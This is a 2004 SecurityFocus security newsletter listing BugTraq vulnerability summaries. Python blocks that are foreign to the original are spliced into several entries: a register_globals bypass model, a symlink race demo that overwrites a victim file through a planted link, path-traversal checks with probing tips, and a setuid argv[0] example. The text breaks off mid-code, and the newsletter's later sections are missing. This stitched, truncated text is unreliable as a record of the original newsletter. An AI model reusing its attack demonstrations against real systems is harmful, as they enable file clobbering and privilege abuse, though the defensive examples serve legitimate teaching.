Free Webinar! Enterprise IM: How IT Managers Can Survive. Featured Speaker:
Nate Root, Senior Analyst, Forrester Research. IT directors and security
managers will gain new insights to balance compliance and security risks.
Highlights an integrated solution from FaceTime Communications and MSN
Messenger Connect for Enterprises. Ideal for financial services,
healthcare, energy companies and other regulated organizations.
View the webinar now!
http://www.securityfocus.com/sponsor/FaceTime_sf-news_040706
I. FRONT AND CENTER
1. Close the E-Mail Wiretap Loophole
2. Multi-Layer Intrusion Detection Systems
3. The Allure and Curse of Complexity
II. BUGTRAQ SUMMARY
1. vBulletin newreply.php Cross-Site Scripting Vulnerability
2. WebSoft HelpDesk PRO SQL Injection Vulnerability
3. WebSoft Infinity WEB SQL Injection Vulnerability
4. MPlayer GUI File Name Buffer Overflow Vulnerability
5. PHPMyFamily Authentication Bypass Vulnerability
6. McMurtrey/Whitaker & Associates Cart32 GetLatestBuilds Scrip...
7. CGIScript.net CSFAQ Script Path Disclosure Vulnerability
8. Apache ap_escape_html Memory Allocation Denial Of Service Vu...
9. CuteNews Multiple Cross-site Scripting Vulnerabilities
10. D-Link AirPlus DI-614+, DI-624, and DI-604 DHCP Server Flood...
11. PowerPortal Multiple Input Validation Vulnerabilities
12. Sun Java Runtime Environment Font Object Assertion Failure D...
13. BEA WebLogic Server And WebLogic Express Application Role Un...
14. Popclient Email Message Buffer Overflow Vulnerability
15. I-Mall Commerce I-mall Script Remote Command Execution Vulne...
16. Microsoft Internet Explorer Cross-Domain Frame Loading Vulne...
17. Dr. Web Unspecified Buffer Overflow Vulnerability
18. phpMyAdmin Multiple Input Validation Vulnerabilities
19. HP-UX ObAM WebAdmin Unspecified Unauthorized Access Vulnerab...
20. HP-UX Undisclosed ARPA Transport Local Denial Of Service Vul...
21. Linux Kernel Sbus PROM Driver Multiple Integer Overflow Vuln...
22. Pavuk Remote Stack-Based Buffer Overrun Vulnerability
23. Linux Kernel IPTables Sign Error Denial Of Service Vulnerabi...
24. HP-UX Netscape Browser Multiple Vulnerabilities
25. Juniper JUNOS Packet Forwarding Engine IPv6 Denial of Servic...
26. Open WebMail Vacation.PL Remote Command Execution Variant Vu...
27. ZyXEL Prestige Router Authentication Password Field Remote D...
28. New Atlanta ServletExec Unauthorized Access Vulnerability
29. RSBAC Jail SUID And SGID File Creation Vulnerability
30. IBM Lotus Domino Server Web Access Malicious Email View Remo...
31. IBM Lotus Domino IMAP Quota Changing Vulnerability
32. FreeBSD Linux Binary Compatibility Memory Access Vulnerabili...
33. Esearch eupdatedb Symbolic Link Vulnerability
34. Netegrity IdentityMinder Multiple Cross-Site Scripting Vulne...
35. Qbik WinGate Information Disclosure Vulnerability
36. IBM Informix I-Spy Local Privilege Escalation Vulnerability
37. SCI Photo Chat Server Cross-Site Scripting Vulnerability
III. SECURITYFOCUS NEWS ARTICLES
1. Gates Defends Microsoft Patch Efforts
2. Wi-fi hopper guilty of cyber-extortion
3. Feds urge secrecy over network outages
4. Bagle source code unleashed
5. IE workaround a non-starter
6. Spanish Zombie PC virus author jailed
IV. SECURITYFOCUS TOP 6 TOOLS
1. mod_auth_nufw 1.0.1
2. Ettercap v0.7.0 pre2
3. Free CPM Cellular Passwords Manager 1.0
4. DumpSIS.pl 0.81
5. CifsPwScanner 1.0.3
6. Wasabi 0.2
V. SECURITYJOBS LIST SUMMARY
1. IT Auditor vacancy UK (Thread)
2. Seeking Information Security Professionals in NYC (Thread)
3. Do you seek an Information Security Expert? (Thread)
4. Sr. Associate - Threat & Vulnerability Management - ... (Thread)
5. New to security field (Thread)
6. Network Security Engineer, NYC (Thread)
7. [WANT] Security or Computer/Tech Support Position (Thread)
8. Security Engineer job opp. @ Reactivity Inc., Belmo... (Thread)
9. Seeking security developers (Thread)
10. Security SW- Tech support- Cupertino, CA- ArcSight (Thread)
11. Information Security with Microsoft emphasis - CA, I... (Thread)
12. Jr. Level Perimeter Security - New York (Thread)
13. Solutions Consultant (SE) - Bay Area (Thread)
14. Security Architect - Boston (Thread)
15. Summertime Positions in Heidelberg, Germany (Thread)
16. MITRE - Information Assurance Architect - Hanover, M... (Thread)
17. Security Consultants: Wash. D.C. or CA- ArcSight (Thread)
18. Security Architect for Federal.- Wash D.C. ArcSight (Thread)
19. WEST COAST SALES ENGINEER (Thread)
20. Security Engineer - LOS ANGELES, CA - Financial Ins... (Thread)
21. Director / VP Business Development--Network Securit... (Thread)
22. IT Security Architect required in the UK (Thread)
VI. INCIDENTS LIST SUMMARY
1. Remote registry changes from an ISA server (Thread)
2. Unknown Malware found csdiv.dll (Thread)
3. Scob infection statistics, etc.. (Thread)
VII. VULN-DEV RESEARCH LIST SUMMARY
NO NEW POSTS FOR THE WEEK 2004-06-29 to 2004-07-06.
VIII. MICROSOFT FOCUS LIST SUMMARY
1. supressing IE (Thread)
2. Non Admin Rights + Visual Studio (Thread)
3. Consumer Security Web Site (Thread)
4. Administrivia: Out of Office Autoreplies (Thread)
5. Article Announcement: Redmond's Butterfly Effect (Thread)
6. SecurityFocus Microsoft Newsletter #195 (Thread)
7. RE: Consumer Security Web Site (Thread)
IX. SUN FOCUS LIST SUMMARY
1. secure NFS problem (Thread)
X. LINUX FOCUS LIST SUMMARY
1. Weird! (Thread)
2. Last login missing (Thread)
3. Error installing Clamav? (Thread)
4. just running tcpdump makes promisc mode? (Thread)
XI. UNSUBSCRIBE INSTRUCTIONS
XII. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Close the E-Mail Wiretap Loophole
By Mark Rasch
Some pretty sleazy operators are slipping through a hole in a federal
wiretap law that arguably leaves your e-mail unprotected from snooping.
http://www.securityfocus.com/columnists/253
2. Multi-Layer Intrusion Detection Systems
By Nathan Einwechter
This article discusses a framework for a mIDS, a system that brings together
many layers of technology into a single monitoring and analysis engine,
from integrity monitoring software like Tripwire to system logs, IDS logs,
and firewall logs.
http://www.securityfocus.com/infocus/1788
3. The Allure and Curse of Complexity
By Jason Miller
The curse of complexity is the bane of every security administrator, so
UNIX users take your pick: would you like BSD or Linux?
http://www.securityfocus.com/columnists/252
II. BUGTRAQ SUMMARY
-------------------
1. vBulletin newreply.php Cross-Site Scripting Vulnerability
BugTraq ID: 10612
Remote: Yes
Date Published: Jun 26 2004
Relevant URL: http://www.securityfocus.com/bid/10612
Summary:
vBulletin is reportedly affected by a cross-site scripting vulnerability in the newreply.php script. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
An attacker may exploit this issue to have malicious HTML or script code executed in the browser of an unsuspecting user, within the context of the vulnerable site. This may lead to theft of cookie-based authentication credentials; other attacks are also possible.
2. WebSoft HelpDesk PRO SQL Injection Vulnerability
BugTraq ID: 10613
Remote: Yes
Date Published: Jun 26 2004
Relevant URL: http://www.securityfocus.com/bid/10613
Summary:
Reportedly WebSoft HelpDesk PRO is affected by an SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
It is likely that this issue is related to the issue discussed in WebSoft Infinity WEB SQL Injection Vulnerability (BID 10614). This BID will be updated when more information becomes available.
An attacker might leverage this issue to inject malicious SQL queries or alter existing ones. This would allow the attacker to manipulate database queries to bypass authentication mechanisms; other attacks might also be possible.
3. WebSoft Infinity WEB SQL Injection Vulnerability
BugTraq ID: 10614
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10614
Summary:
Reportedly WebSoft Infinity WEB is affected by an SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
It is likely that this issue is related to the issue discussed in WebSoft HelpDesk PRO SQL Injection Vulnerability (BID 10613). This BID will be updated when more information becomes available.
An attacker might leverage this issue to inject malicious SQL queries or alter existing ones. This would allow the attacker to manipulate database queries to bypass authentication mechanisms; other attacks might also be possible.
4. MPlayer GUI File Name Buffer Overflow Vulnerability
BugTraq ID: 10615
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10615
Summary:
It has been reported that MPlayer when used with the graphical user interface (GUI) is affected by a buffer overflow vulnerability. This issue is due to a failure of the application to properly handle user-supplied strings when copying them into finite buffers.
Successful exploitation would immediately produce a denial of service condition in the affected process. This issue may also be leveraged to execute code on the affected system within the security context of the user running the vulnerable process.
5. PHPMyFamily Authentication Bypass Vulnerability
BugTraq ID: 10616
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10616
Summary:
phpmyfamily is prone to an authentication bypass vulnerability.
This issue reportedly occurs only when the register_globals PHP configuration directive is enabled. Exploitation could permit an unauthorized remote user to edit site content.
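With register_globals enabled, PHP turns every request parameter into a script variable before the script's own code runs, so any flag the script reads before initialising it can be pre-set from the query string. The following Python model of that behaviour is an added example, not phpmyfamily's code; the parameter name "authenticated" and the session layout are assumptions chosen to show the bug class.

```python
def edit_page_vulnerable(request_params, session):
    """Model of a PHP script running with register_globals = On.

    Every request parameter is dropped into the script's variable scope
    first, exactly as register_globals does with $_GET/$_POST.
    """
    script_vars = dict(request_params)  # attacker seeds the namespace
    if session.get("user") is not None:  # the only legitimate path
        script_vars["authenticated"] = True
    # The script never set $authenticated = false up front, so a request
    # parameter of the same name (?authenticated=1) is trusted as-is.
    if script_vars.get("authenticated"):
        return "edit form"
    return "login required"


def edit_page_safe(request_params, session):
    """Same page with the flag initialised and derived only from the session."""
    authenticated = False  # explicit initialisation, never from the request
    if session.get("user") is not None:
        authenticated = True
    # request_params is only ever read by name for the fields the page needs.
    return "edit form" if authenticated else "login required"
```

On the server side the durable fix is `register_globals = Off` in php.ini; on the application side it is initialising every security-relevant variable before use and reading request data only through `$_GET`, `$_POST` and `$_SESSION`.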
6. McMurtrey/Whitaker & Associates Cart32 GetLatestBuilds Scrip...
BugTraq ID: 10617
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10617
Summary:
Cart32 is reported prone to a cross-site scripting vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data.
A remote attacker can exploit this issue by creating a malicious link to the vulnerable application that includes hostile HTML and script code. If a user follows this link, the hostile code renders in the web browser of the victim user. Theft of cookie-based authentication credentials and other attacks are possible.
Cart32 version 5.0 and prior are considered prone to this issue.
7. CGIScript.net CSFAQ Script Path Disclosure Vulnerability
BugTraq ID: 10618
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10618
Summary:
A vulnerability has been identified in the application that may allow an attacker to disclose the installation path.
Successful exploitation of this vulnerability may allow an attacker to gain sensitive information about the file system that may aid in launching more direct attacks against the system.
All current versions of csFAQ are considered vulnerable to this issue.
8. Apache ap_escape_html Memory Allocation Denial Of Service Vu...
BugTraq ID: 10619
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10619
Summary:
Apache Web Server is reportedly affected by a memory allocation based denial of service vulnerability. This issue is due to a failure of the server to handle excessively long HTTP header strings.
This issue would allow an attacker to cause the affected application to crash, denying service to legitimate users.
Although only Apache version 2.0.49 is reportedly affected by this issue, it is likely that earlier versions are affected as well.
9. CuteNews Multiple Cross-site Scripting Vulnerabilities
BugTraq ID: 10620
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10620
Summary:
It is reported that CuteNews is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input.
The problems present themselves when malicious HTML and script code is sent to the application through the 'id' parameter of multiple scripts.
These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were followed, the hostile code may be rendered in the web browser of the victim user.
10. D-Link AirPlus DI-614+, DI-624, and DI-604 DHCP Server Flood...
BugTraq ID: 10621
Remote: Yes
Date Published: Jun 27 2004
Relevant URL: http://www.securityfocus.com/bid/10621
Summary:
The D-Link DI-614+, DI-624, and DI-604 are reported susceptible to a denial of service vulnerability in their DHCP service.
By flooding the DHCP service with valid DHCP requests, the device will reportedly consume all available memory and eventually reboot.
An attacker may be able to deny service to legitimate users of an affected device by repeatedly causing the device to reboot.
The DI-614+ with firmware revision 2.30, and the DI-604 with unknown firmware were reported vulnerable. The DI-624 Revision B was also confirmed susceptible.
11. PowerPortal Multiple Input Validation Vulnerabilities
BugTraq ID: 10622
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10622
Summary:
PowerPortal is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application:
PowerPortal is prone to multiple cross-site scripting vulnerabilities. These cross-site scripting issues can permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If a user follows the malicious link, the attacker-supplied code executes in the web browser of the victim user. This attack can allow for theft of cookie-based authentication credentials and other attacks.
Additionally, PowerPortal is prone to an information disclosure vulnerability. It is reported that a remote attacker may reveal directory listings, by supplying directory traversal sequences to the 'modules.php' script.
The information disclosure vulnerability may be employed by the attacker in order to reveal potentially sensitive information regarding the layout of the filesystem on the affected computer.
12. Sun Java Runtime Environment Font Object Assertion Failure D...
BugTraq ID: 10623
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10623
Summary:
The Sun Java Runtime Environment Font object is reportedly vulnerable to an assertion failure denial of service vulnerability. This issue is due to a failure of the process to handle exceptional conditions when processing font objects.
This issue is reported to affect Java Runtime Environment versions 1.4.1 through 1.4.2; it is likely however that other versions are also affected. This issue will crash Internet browsers running an affected Java plug-in as well.
This issue may be exploited by an attacker to cause a vulnerable application, as well as all processes spawned from the application, to crash, denying service to legitimate users. Due to the scope of the crash, data loss may occur.
13. BEA WebLogic Server And WebLogic Express Application Role Un...
BugTraq ID: 10624
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10624
Summary:
WebLogic Server and WebLogic Express are affected by a vulnerability that may allow unauthorized access to application roles. This issue is due to a failure of the application to properly implement the Servlet 2.3 specification, facilitating unauthorized access.
It should be noted that this issue only arises when a web application is built using the '*' specifier within the '<role-name>' tags, resources are defined to be protected by the '*' specifier, and users exist without explicitly defined roles. Due to the circumstantial nature of this issue, exploitation may be unlikely.
This issue would allow an attacker to carry out actions outside of the defined roles; potentially leading to unauthorized access or other attacks.
14. Popclient Email Message Buffer Overflow Vulnerability
BugTraq ID: 10625
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10625
Summary:
It has been reported that popclient is affected by an off-by-one buffer overflow vulnerability. This issue is due to a failure of the application to properly manage static stack-based buffers.
Successful exploitation of this issue may cause a denial of service condition in the affected application; it is considered unlikely, though not impossible, that this issue could be leveraged to execute code.
15. I-Mall Commerce I-mall Script Remote Command Execution Vulne...
BugTraq ID: 10626
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10626
Summary:
i-mall.cgi is reported prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data and may allow a remote attacker to pass arbitrary shell commands to the vulnerable script.
16. Microsoft Internet Explorer Cross-Domain Frame Loading Vulne...
BugTraq ID: 10627
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10627
Summary:
Microsoft Internet Explorer is reported prone to a cross-domain frame loading vulnerability. It is reported that if the name of a frame rendered in a target site is known, then an attacker may potentially render arbitrary HTML in the frame of the target site.
An attacker may exploit this vulnerability to spoof an interface of a trusted web site.
17. Dr. Web Unspecified Buffer Overflow Vulnerability
BugTraq ID: 10628
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10628
Summary:
It has been reported that an unspecified buffer overflow vulnerability exists in Dr. Web.
Users of Dr. Web have reported seeing this message logged to syslog by ProPolice on OpenBSD computers:
drwebd: stack overflow in function int scanMail(int, time_t *, int, int, const char *)
An unspecified buffer overflow in the scanMail() function may be exploitable. If it is, attempts to exploit it may result in the affected application crashing. This may also be leveraged to execute arbitrary code in the context of the Dr. Web process.
As more information is known, this BID will be updated.
18. phpMyAdmin Multiple Input Validation Vulnerabilities
BugTraq ID: 10629
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10629
Summary:
phpMyAdmin is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application:
It is reported that a malicious attacker can add arbitrary servers to phpMyAdmin. By constructing a URI request for the phpMyAdmin 'left.php' script an attacker may specify and add an arbitrary SQL server.
A remote attacker may exploit this vulnerability to replace server configurations and as a result introduce a malicious SQL server into the phpMyAdmin controlled server list.
phpMyAdmin is reported prone to a remote PHP code execution vulnerability. It is reported that a malicious database table name beginning with "'" breaks out of the quoted string passed to a PHP eval() statement and thereby permits an attacker to execute arbitrary PHP code.
19. HP-UX ObAM WebAdmin Unspecified Unauthorized Access Vulnerab...
BugTraq ID: 10630
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10630
Summary:
HP-UX ObAM WebAdmin is reported prone to an unspecified vulnerability. This issue may allow a remote attacker to gain unauthorized access to a vulnerable computer.
HP-UX B.11.11 is reported prone to this issue.
Due to a lack of details, further information is not available at the moment. This BID will be updated as more information becomes available.
20. HP-UX Undisclosed ARPA Transport Local Denial Of Service Vul...
BugTraq ID: 10631
Remote: No
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10631
Summary:
HP-UX is reported vulnerable to an undisclosed local denial of service vulnerability.
Reportedly, there exists a flaw in HP-UX's ARPA transport which could be leveraged by a local user to crash the computer.
21. Linux Kernel Sbus PROM Driver Multiple Integer Overflow Vuln...
BugTraq ID: 10632
Remote: No
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10632
Summary:
It is reported that the OpenPROM Linux kernel driver contains multiple integer overflow vulnerabilities.
Two vulnerabilities are reported to exist in the OpenPROM driver, both of which involve overflowing an integer value. These values are used to allocate kernel memory and subsequently to copy data into the kernel, so an overflowed value can lead to overwriting large amounts of kernel memory.
These vulnerabilities could lead to a system crash, or possible code execution in the context of the kernel.
Some versions of the Linux kernel are vulnerable to both overflows, other versions are only susceptible to one. Kernel version 2.6.6 does not appear to be vulnerable.
22. Pavuk Remote Stack-Based Buffer Overrun Vulnerability
BugTraq ID: 10633
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10633
Summary:
Pavuk is reported prone to a remote buffer overrun vulnerability. It is reported that the issue exists due to a lack of boundary checks performed on third party data, that is received from remote HTTP servers, before the data is copied into a finite stack-based buffer.
Ultimately a remote malicious site may exploit this condition to execute arbitrary code in the context of the user who is running the vulnerable Pavuk software.
23. Linux Kernel IPTables Sign Error Denial Of Service Vulnerabi...
BugTraq ID: 10634
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10634
Summary:
It has been reported that the Linux kernel is affected by a denial of service vulnerability in the iptables implementation. This issue is due to a failure of iptables to handle certain TCP packet header values.
An attacker can exploit this issue to cause the iptables implementation to consume all CPU resources due to an infinite loop, denying service to legitimate users.
24. HP-UX Netscape Browser Multiple Vulnerabilities
BugTraq ID: 10635
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10635
Summary:
HP-UX Netscape browser is reported prone to multiple vulnerabilities. These vulnerabilities can allow a remote attacker to carry out attacks such as denial of service, information disclosure, and unauthorized access to a vulnerable computer.
These issues affect Netscape for HP-UX B.11.00, B.11.11, B.11.22, and B.11.23.
25. Juniper JUNOS Packet Forwarding Engine IPv6 Denial of Servic...
BugTraq ID: 10636
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10636
Summary:
Juniper routers running the JUNOS operating system are reported prone to a denial of service vulnerability due to memory exhaustion. An attacker can cause a persistent denial of service condition by repeatedly sending certain IPv6 packets to a router.
This issue affects the JUNOS Packet Forwarding Engine IPv6 branch released after February 24, 2004. All Juniper Networks M-series and T-series routing platforms with IPv6 support are also prone to this issue.
26. Open WebMail Vacation.PL Remote Command Execution Variant Vu...
BugTraq ID: 10637
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10637
Summary:
A vulnerability is reported in Open WebMail that allows a remote attacker to execute arbitrary commands on a vulnerable host.
Exploitation of the vulnerability could allow a non-privileged user to remotely execute arbitrary commands in the context of the web server that is hosting the vulnerable application.
This vulnerability is reported to affect all versions of Open WebMail released before June 29, 2004.
27. ZyXEL Prestige Router Authentication Password Field Remote D...
BugTraq ID: 10638
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10638
Summary:
ZyXEL Prestige routers are reported prone to a remote denial of service vulnerability. The issue is reported to exist due to a lack of boundary checks performed on password string data handled by the device authentication interface.
A remote attacker who has access to the authentication interface of the affected appliance may trigger a device reset at will, effectively denying service to legitimate users.
28. New Atlanta ServletExec Unauthorized Access Vulnerability
BugTraq ID: 10639
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10639
Summary:
It has been reported that New Atlanta ServletExec is affected by an unauthorized access vulnerability; fixes are available. This issue is due to an access validation error.
This issue would allow an attacker to upload and execute files on the affected computer, facilitating unauthorized interactive access as well as other attacks. This issue might also be leveraged to cause a denial of service condition in the affected server.
29. RSBAC Jail SUID And SGID File Creation Vulnerability
BugTraq ID: 10640
Remote: No
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10640
Summary:
The process jail feature of RSBAC reportedly improperly allows files to be created with SUID and SGID attributes.
These files can then be used to escalate the privileges inside the jail. This may allow for further attacks and possible system compromises.
Versions 1.2.2 and 1.2.3 are reported to be vulnerable to this issue. A patch has been released by the vendor.
30. IBM Lotus Domino Server Web Access Malicious Email View Remo...
BugTraq ID: 10641
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10641
Summary:
Lotus Domino Server is reported prone to a remote denial of service vulnerability. The issue is reported to exist when a malicious email that is received on the affected server, is opened through the Domino Web Access interface by a client.
A remote attacker may exploit this condition to deny Lotus Domino service to legitimate users.
31. IBM Lotus Domino IMAP Quota Changing Vulnerability
BugTraq ID: 10642
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10642
Summary:
IBM Lotus Domino server is reported to improperly allow users to alter their own mail storage quota values.
A user's mailbox is assigned a quota to limit the amount of data that can be consumed by email on the server. This quota is assigned by the administrator of the application.
An attacker could possibly use this vulnerability to raise their mailbox's quota to a very large amount, and then proceed to fill the mail server's storage device. This will result in a denial of service condition, where new mail cannot be stored on the full disk.
Domino version 6.5.0 and 6.5.1 are reported vulnerable to this issue.
32. FreeBSD Linux Binary Compatibility Memory Access Vulnerabili...
BugTraq ID: 10643
Remote: No
Date Published: Jul 01 2004
Relevant URL: http://www.securityfocus.com/bid/10643
Summary:
It has been reported that FreeBSD is affected by a memory access vulnerability when implementing linux binary compatibility. This issue is due to a programming error that causes certain memory to be accessed without proper validation.
This issue would allow an attacker to disclose and overwrite kernel memory, resulting in information disclosure, privilege escalation and potential denial of service.
33. Esearch eupdatedb Symbolic Link Vulnerability
BugTraq ID: 10644
Remote: No
Date Published: Jul 01 2004
Relevant URL: http://www.securityfocus.com/bid/10644
Summary:
It has been reported that eupdatedb, an esearch utility is affected by a symbolic link vulnerability. This issue is due to a failure of the application to properly handle temporary file creation.
An attacker can leverage this vulnerability to create an arbitrary file with the permissions of an unsuspecting user that has activated the vulnerable utility; facilitating a number of possible attacks.
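The eupdatedb issue is the classic temporary-file race: a predictable name under a world-writable directory is opened for writing without O_EXCL, so a local user who pre-creates that name as a symbolic link gets the victim's write redirected to a file of their choosing. The following is an added example, not esearch code; the file names are constructed in a scratch directory to show the end state of the race and the two safe alternatives (an unpredictable name from mkstemp, or O_CREAT|O_EXCL|O_NOFOLLOW when the name must be fixed).

```python
import os
import tempfile


def write_tmp_unsafe(tmp_path, data):
    """Flawed pattern: fixed name, O_CREAT without O_EXCL, so a planted symlink is followed."""
    with open(tmp_path, "w") as fh:
        fh.write(data)
    return tmp_path


def write_tmp_safe(tmp_dir, data):
    """mkstemp uses O_CREAT|O_EXCL, mode 0600 and an unpredictable name."""
    fd, path = tempfile.mkstemp(prefix="eupdatedb.", dir=tmp_dir)
    with os.fdopen(fd, "w") as fh:
        fh.write(data)
    return path


def open_exclusive(path, data):
    """When the name must be fixed: refuse any pre-existing file or symlink."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)  # raises FileExistsError if planted
    with os.fdopen(fd, "w") as fh:
        fh.write(data)
    return path


def demonstrate():
    """Recreate the state an attacker leaves behind and report what each writer does."""
    scratch = tempfile.mkdtemp()
    victim = os.path.join(scratch, "victim")  # stands in for any file the victim can write
    planted = os.path.join(scratch, "eupdatedb.tmp")  # the predictable name
    with open(victim, "w") as fh:
        fh.write("original\n")
    os.symlink(victim, planted)  # attacker wins the race by pre-creating the link
    write_tmp_unsafe(planted, "clobbered\n")
    with open(victim) as fh:
        victim_after_unsafe = fh.read()
    try:
        open_exclusive(planted, "clobbered again\n")
        exclusive_refused = False
    except FileExistsError:
        exclusive_refused = True
    safe_path = write_tmp_safe(scratch, "index data\n")
    return {
        "victim_after_unsafe": victim_after_unsafe,
        "exclusive_refused": exclusive_refused,
        "safe_in_scratch": os.path.dirname(safe_path) == scratch,
    }
```

Running demonstrate() shows the victim file overwritten through the planted link by the unsafe writer, the exclusive open refusing the link, and mkstemp creating its own file beside it. The same test, pointed at a real utility's known temporary path, is a quick way to confirm whether a fix actually stops following symlinks.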
34. Netegrity IdentityMinder Multiple Cross-Site Scripting Vulne...
BugTraq ID: 10645
Remote: Yes
Date Published: Jul 01 2004
Relevant URL: http://www.securityfocus.com/bid/10645
Summary:
Netegrity IdentityMinder is a tool designed for the Microsoft Windows platform to manage and maintain users and user accounts. The tool supports a web based interface for creating and removing users in multi-user environments.
It has been reported that Netegrity IdentityMinder is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input.
A remote attacker can exploit this issue by creating a malicious link to the vulnerable application that includes hostile HTML and script code. If this link were followed by an unsuspecting user, the hostile code may be rendered in their web browser in the security context of the vulnerable site. This may allow for theft of cookie-based authentication credentials as well as execution of application functions, such as account changes, on the victim's behalf.
35. Qbik WinGate Information Disclosure Vulnerability
BugTraq ID: 10646
Remote: Yes
Date Published: Jul 02 2004
Relevant URL: http://www.securityfocus.com/bid/10646
Summary:
WinGate is reported susceptible to an information disclosure vulnerability in its HTTP proxy server.
An internal web server contained in WinGate improperly allows attackers to read arbitrary files outside of its document root. WinGate by default runs as the LocalSystem account, so this vulnerability allows remote attackers to read any file on the system.
An attacker can exploit this issue to read arbitrary files contained on the WinGate computer. These files may contain sensitive information that may aid in further attacks.
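Both the PowerPortal 'modules.php' directory listing issue (BID 10622) and this WinGate document-root escape come from the same mistake: the request path is decoded and joined onto a base directory without checking where the result lands. The following is an added example, not code from either product; the document root and request paths are constructed. It contrasts the naive mapping with one that decodes first, resolves symlinks on both sides, and then requires the result to remain below the root.

```python
import os
from urllib.parse import unquote


def resolve_naive(docroot, request_path):
    """Flawed mapping: decode, concatenate, normalise. '..' segments are honoured."""
    return os.path.normpath(os.path.join(docroot, unquote(request_path).lstrip("/")))


def resolve_under_root(docroot, request_path):
    """Map a request path onto the filesystem, refusing anything outside docroot.

    Decoding happens first so the check sees what the filesystem will see
    (%2e%2e is '..'). realpath on both sides resolves symlinks, so a link
    inside the root that points outside it is caught as well.
    """
    root = os.path.realpath(docroot)
    relative = unquote(request_path).lstrip("/\\")
    candidate = os.path.realpath(os.path.join(root, relative))
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError("request escapes document root: %r" % request_path)
    return candidate


def escapes_root(docroot, request_path):
    """Predicate form of the same check, convenient for scanners and tests."""
    try:
        resolve_under_root(docroot, request_path)
    except PermissionError:
        return True
    return False
```

A practitioner testing a proxy or portal for this class sends the encoded and unencoded forms of `../` (and, on Windows targets, `..\`) and compares responses; a server that answers the encoded form differently from the plain form is usually decoding after its check rather than before it.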
36. IBM Informix I-Spy Local Privilege Escalation Vulnerability
BugTraq ID: 10647
Remote: No
Date Published: Jul 02 2004
Relevant URL: http://www.securityfocus.com/bid/10647
Summary:
It is reported that I-Spy is susceptible to a privilege escalation vulnerability in its 'runbin' binary.
The 'runbin' binary uses its argv[0] to determine both the name of a binary to run, and the path to that binary. 'runbin' is installed setuid root by default.
An attacker with local interactive access to a computer with an affected version of I-Spy installed would be able to exploit this fact to cause attacker specified binaries to be run as the superuser.
I-Spy version 2.x is reported vulnerable to this issue.
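argv[0] is not a property of the program file; it is whatever the caller passes to execve(2), so a setuid helper that derives a path from it is executing a caller-chosen binary as root. The following is an added example, not I-Spy code; the directory and program names are assumptions. It shows the flawed derivation beside one that takes only a basename, checks it against an allowlist, and fixes the directory itself, plus a small demonstration that a caller can put anything at all in argv[0].

```python
import os
import subprocess

# Assumed layout for this illustration (not I-Spy's real install): the helper
# may only launch programs from one fixed directory, selected by basename.
TRUSTED_BIN_DIR = "/opt/ispy/bin"
ALLOWED_PROGRAMS = {"ispyd", "ispyctl"}


def resolve_target_unsafe(argv0):
    """Flawed pattern: directory and name both come straight from argv[0]."""
    return os.path.abspath(argv0)


def is_allowed(argv0):
    """True only for a bare, allowlisted program name."""
    return os.path.basename(argv0) in ALLOWED_PROGRAMS


def resolve_target_safe(argv0):
    """Take only the basename, allowlist it, and supply the directory ourselves."""
    name = os.path.basename(argv0)
    if name not in ALLOWED_PROGRAMS:
        raise PermissionError("refusing to run %r" % name)
    return os.path.join(TRUSTED_BIN_DIR, name)


def caller_chosen_argv0():
    """Run /bin/sh with argv[0] set to '/tmp/evil' and have it print $0.

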